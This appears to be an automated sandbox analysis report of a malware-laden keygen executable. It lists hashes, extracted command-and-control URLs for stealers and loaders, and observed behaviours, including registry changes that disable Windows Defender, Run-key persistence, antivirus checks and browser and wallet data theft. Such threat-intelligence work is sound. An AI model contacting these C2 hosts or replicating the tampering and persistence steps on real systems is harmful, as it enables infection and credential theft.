Analysis
-
max time kernel
159s -
max time network
599s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
03-04-2021 06:43
Static task
static1
Behavioral task
behavioral1
Sample
My.Lockbox.2.7.7.Christmas.Edi.serials.generator.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
My.Lockbox.2.7.7.Christmas.Edi.serials.generator.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
My.Lockbox.2.7.7.Christmas.Edi.serials.generator.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
My.Lockbox.2.7.7.Christmas.Edi.serials.generator.exe
Resource
win10v20201028
General
-
Target
My.Lockbox.2.7.7.Christmas.Edi.serials.generator.exe
-
Size
5.4MB
-
MD5
71e1b5c96e0b450768b799f4f2ba8c6a
-
SHA1
d974040a5020d4132094f04d42edfb24c28b3c1a
-
SHA256
16bd29c401eabb1c1d158f615fab03d81d6db786d936c4f3d3f929a16162d1c2
-
SHA512
96009bbccfedc418a4ed8a02d19e9c42f90eb6f9827ae0da554e1d8d4a8eb89255e0434eaec0ebf2b72967b52fb604845c85819bf7ccc82ef912edb8dd8cbdfc
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral3/memory/6136-231-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral3/memory/6136-233-0x0000000002550000-0x0000000002E5A000-memory.dmp family_glupteba behavioral3/memory/6136-234-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 8 IoCs
resource yara_rule behavioral3/memory/2504-158-0x00000001402CA898-mapping.dmp xmrig behavioral3/memory/2504-157-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/2504-160-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/2504-162-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/16364-1004-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/16364-1045-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/6876-1056-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/6876-1152-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Blocklisted process makes network request 5 IoCs
flow pid Process 109 2504 msiexec.exe 285 6452 MsiExec.exe 290 6452 MsiExec.exe 296 6452 MsiExec.exe 299 6452 MsiExec.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts ppppppfy.exe File opened for modification C:\Windows\system32\drivers\etc\hosts Microsoft.exe -
Executes dropped EXE 64 IoCs
pid Process 500 keygen-pr.exe 2792 keygen-step-1.exe 3844 keygen-step-3.exe 2180 keygen-step-4.exe 4040 key.exe 1356 Setup.exe 3816 multitimer.exe 3896 setups.exe 3680 setups.tmp 2900 askinstall20.exe 4540 Full Program Features.exe 4648 file.exe 1308 multitimer.exe 4632 multitimer.exe 4872 B471.tmp.exe 4988 B702.tmp.exe 3916 B974.tmp.exe 3692 B471.tmp.exe 4584 md2_2efs.exe 4188 KiffApp1.exe 5108 gcttt.exe 2040 elrtzrqbdi1.exe 5264 elrtzrqbdi1.tmp 5280 Setup3310.exe 5336 Setup3310.tmp 5360 frfouitb4n5.exe 5452 vict.exe 5512 vict.tmp 5596 vpn.exe 5632 vpn.tmp 5656 lf2lsaeghdu.exe 5764 IBInstaller_97039.exe 4736 IBInstaller_97039.tmp 6072 hjtdaeqwtkr.exe 6136 app.exe 4804 winlthsth.exe 2512 win1host.exe 1472 1.exe 2716 Setup.exe 5708 2.exe 644 hjjgaa.exe 1408 RunWW.exe 4316 jg7_7wjg.exe 4280 LabPicV3.exe 5664 lylal220.exe 5572 22.exe 5040 guihuali-game.exe 6080 Microsoft.exe 5100 Three.exe 5240 lilalmix.exe 4936 J1bOtx55AJEQ.exe 3580 LabPicV3.tmp 5400 lylal220.tmp 184 jfiag3g_gg.exe 5224 GO7uHb4oo.exe 4732 AdvancedRun.exe 4696 1a8L2Mn3F.exe 5936 GO7uHb4oo.exe 4812 1a8L2Mn3F.exe 2064 jfiag3g_gg.exe 6080 Microsoft.exe 4300 multitimer.exe 5368 ppppppfy.exe 6112 setups.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 52 IoCs
pid Process 3680 setups.tmp 3680 setups.tmp 3680 setups.tmp 3680 setups.tmp 3680 setups.tmp 3680 setups.tmp 3680 setups.tmp 4728 rundll32.exe 5264 elrtzrqbdi1.tmp 5336 Setup3310.tmp 5336 Setup3310.tmp 5512 vict.tmp 5632 vpn.tmp 5632 vpn.tmp 5656 lf2lsaeghdu.exe 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 4736 IBInstaller_97039.tmp 3580 LabPicV3.tmp 5400 lylal220.tmp 5324 MsiExec.exe 5324 MsiExec.exe 5324 MsiExec.exe 3784 setups.tmp 3784 setups.tmp 3784 setups.tmp 3784 setups.tmp 3784 setups.tmp 3784 setups.tmp 3784 setups.tmp 4768 rundll32.exe 4684 rundll32.exe 6564 client32.exe 6564 client32.exe 6564 client32.exe 6564 client32.exe 6452 MsiExec.exe 6564 client32.exe 6564 client32.exe 6452 MsiExec.exe 6452 MsiExec.exe 6452 MsiExec.exe 6452 MsiExec.exe 6452 MsiExec.exe 6452 MsiExec.exe 6452 MsiExec.exe 6452 MsiExec.exe 6452 MsiExec.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 1.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 1.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions 1.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection 1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" 1.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\1.exe = "0" 1.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet 1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" 1.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\em4kgh5ysha = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\ND7OKOJ003\\multitimer.exe\" 1 3.1617432245.60680eb59572c" multitimer.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run B702.tmp.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" B702.tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" hjjgaa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\t0r0g2pyvrr = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\SZPL8V2OQD\\multitimer.exe\" 1 3.1617432347.60680f1b84e55" multitimer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Multimedia Platform\\SHibaboshycu.exe\"" ppppppfy.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MSBuild\\Mifaehetovae.exe\"" Microsoft.exe -
Checks for any installed AV software in registry 1 TTPs 53 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg7_7wjg.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\U: lf2lsaeghdu.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: lf2lsaeghdu.exe File opened (read-only) \??\M: lf2lsaeghdu.exe File opened (read-only) \??\P: lf2lsaeghdu.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\F: lf2lsaeghdu.exe File opened (read-only) \??\Q: lf2lsaeghdu.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\J: lf2lsaeghdu.exe File opened (read-only) \??\N: lf2lsaeghdu.exe File opened (read-only) \??\X: lf2lsaeghdu.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\B: lf2lsaeghdu.exe File opened (read-only) \??\E: lf2lsaeghdu.exe File opened (read-only) \??\G: lf2lsaeghdu.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\O: lf2lsaeghdu.exe File opened (read-only) \??\S: lf2lsaeghdu.exe File opened (read-only) \??\T: lf2lsaeghdu.exe File opened (read-only) \??\Y: lf2lsaeghdu.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\H: lf2lsaeghdu.exe File opened (read-only) \??\V: lf2lsaeghdu.exe File opened (read-only) \??\W: lf2lsaeghdu.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: lf2lsaeghdu.exe File opened (read-only) \??\K: lf2lsaeghdu.exe File opened (read-only) \??\L: lf2lsaeghdu.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\R: lf2lsaeghdu.exe File opened (read-only) \??\Z: lf2lsaeghdu.exe File opened (read-only) \??\I: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 559 api.ipify.org 645 ipinfo.io 649 ipinfo.io 82 api.ipify.org 166 ipinfo.io 342 ipinfo.io 543 ipinfo.io 647 ipinfo.io 170 ipinfo.io 213 ip-api.com 239 api.ipify.org 347 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\OM8R3N91.cookie svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\OM8R3N91.cookie svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
pid Process 1472 1.exe 1472 1.exe 1472 1.exe 1472 1.exe 1472 1.exe 1472 1.exe 1472 1.exe 1472 1.exe 1472 1.exe 1472 1.exe 1472 1.exe 1472 1.exe 1472 1.exe 1472 1.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 900 set thread context of 4852 900 svchost.exe 107 PID 4872 set thread context of 3692 4872 B471.tmp.exe 114 PID 4988 set thread context of 4808 4988 B702.tmp.exe 117 PID 4988 set thread context of 2504 4988 B702.tmp.exe 122 PID 5224 set thread context of 5936 5224 GO7uHb4oo.exe 182 PID 4936 set thread context of 5536 4936 J1bOtx55AJEQ.exe 183 PID 4696 set thread context of 4812 4696 1a8L2Mn3F.exe 184 PID 5708 set thread context of 1252 5708 2.exe 195 PID 1472 set thread context of 6716 1472 1.exe 216 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\viewerise\is-OTCPS.tmp elrtzrqbdi1.tmp File opened for modification C:\Program Files (x86)\Picture Lab\DockingToolbar.dll prolab.tmp File created C:\Program Files (x86)\MaskVPN\is-RQCHS.tmp vpn.tmp File created C:\Program Files\javcse\install.dll 22.exe File opened for modification C:\Program Files (x86)\I-record\avutil-51.dll irecord.tmp File created C:\Program Files (x86)\I-record\is-6SJJE.tmp irecord.tmp File created C:\Program Files (x86)\I-record\is-3P1UG.tmp irecord.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-V41UN.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Install engine 16\PPMd.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\Install engine 16\unins000.dat IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-LSRGO.tmp vpn.tmp File created C:\Program Files (x86)\Install engine 16\is-423EJ.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\Install engine 16\is-OOEQR.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\d.jfm jg7_7wjg.exe File created C:\Program Files (x86)\Picture Lab\is-SMRVR.tmp prolab.tmp File opened for modification C:\Program Files (x86)\I-record\avfilter-2.dll irecord.tmp File created C:\Program Files (x86)\MaskVPN\is-GJ626.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-BRME2.tmp vpn.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe Setup.exe File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe Setup.exe File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe Setup.exe File opened for modification C:\Program Files (x86)\Picture Lab\unins000.dat prolab.tmp File created C:\Program Files\unins0000.dll Full Program Features.exe File opened for modification C:\Program Files (x86)\Install engine 16\libGLESv2.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\viewerise\NDP472-KB4054531-Web.exe elrtzrqbdi1.tmp File opened for modification C:\Program Files (x86)\Picture Lab\SourceGrid2.dll prolab.tmp File created C:\Program Files\unins.vbs Full Program Features.exe File created C:\Program Files (x86)\MaskVPN\is-M5QQ4.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-6C6GM.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-RE1HG.tmp vpn.tmp File created C:\Program Files\jp2native.dll guihuali-game.exe File opened for modification C:\Program Files (x86)\Picture Lab\WeifenLuo.WinFormsUI.dll prolab.tmp File created C:\Program Files (x86)\I-record\is-GOQGG.tmp irecord.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-9LS6D.tmp vpn.tmp File created C:\Program Files (x86)\Install engine 16\is-1ILSU.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\viewerise\unins000.dat elrtzrqbdi1.tmp File created C:\Program Files\api-ms-win-crt-convert-l1-1-0.dll guihuali-game.exe File created C:\Program Files\javcse\license.dat 22.exe File opened for modification C:\Program Files (x86)\Picture Lab\Pictures Lab.exe prolab.tmp File opened for modification C:\Program Files (x86)\I-record\postproc-52.dll irecord.tmp File opened for modification C:\Program Files (x86)\I-record\swresample-0.dll irecord.tmp File created C:\Program Files (x86)\Install engine 16\is-GFFP4.tmp IBInstaller_97039.tmp File created C:\Program Files\javcse\install.vbs 22.exe File created C:\Program Files (x86)\I-record\is-T4MQ3.tmp irecord.tmp File opened for modification C:\Program Files (x86)\Install engine 16\d3dcompiler_47.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-MQE11.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-5I53C.tmp vpn.tmp File created C:\Program Files (x86)\Install engine 16\is-BKBP5.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\Picture Lab\is-KM9I5.tmp prolab.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-PJ3KE.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-A5EQ1.tmp vpn.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe Setup.exe File created C:\Program Files\Windows Mail\POQWOLXCYS\irecord.exe.config Microsoft.exe File opened for modification C:\Program Files (x86)\I-record\i-record.exe irecord.tmp File created C:\Program Files (x86)\I-record\is-4F2N6.tmp irecord.tmp File created C:\Program Files (x86)\I-record\is-J48JK.tmp irecord.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-BD2BP.tmp vpn.tmp File opened for modification C:\Program Files (x86)\viewerise\unins000.dat elrtzrqbdi1.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe Setup.exe File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe Setup.exe File created C:\Program Files\Windows Mail\POQWOLXCYS\irecord.exe Microsoft.exe File opened for modification C:\Program Files (x86)\I-record\AForge.Video.FFMPEG.dll irecord.tmp -
Drops file in Windows directory 25 IoCs
description ioc Process File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI3EFB.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\Installer\MSI9C74.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI442C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI94B1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI95DB.tmp msiexec.exe File opened for modification C:\Windows\Installer\f761df4.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI3B02.tmp msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI932A.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIAD4E.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\MSI370A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6BD9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6E3C.tmp msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe File created C:\Windows\Installer\f761df4.msi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 16 IoCs
pid pid_target Process procid_target 6840 1472 WerFault.exe 153 11680 1408 WerFault.exe 161 12628 1408 WerFault.exe 161 13376 1408 WerFault.exe 161 13860 1408 WerFault.exe 161 14144 1408 WerFault.exe 161 3824 1408 WerFault.exe 161 14732 1408 WerFault.exe 161 15404 1408 WerFault.exe 161 4264 1408 WerFault.exe 161 4088 9420 WerFault.exe 266 7296 1408 WerFault.exe 161 7996 1408 WerFault.exe 161 6880 1408 WerFault.exe 161 8020 1408 WerFault.exe 161 13844 14076 WerFault.exe 444 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
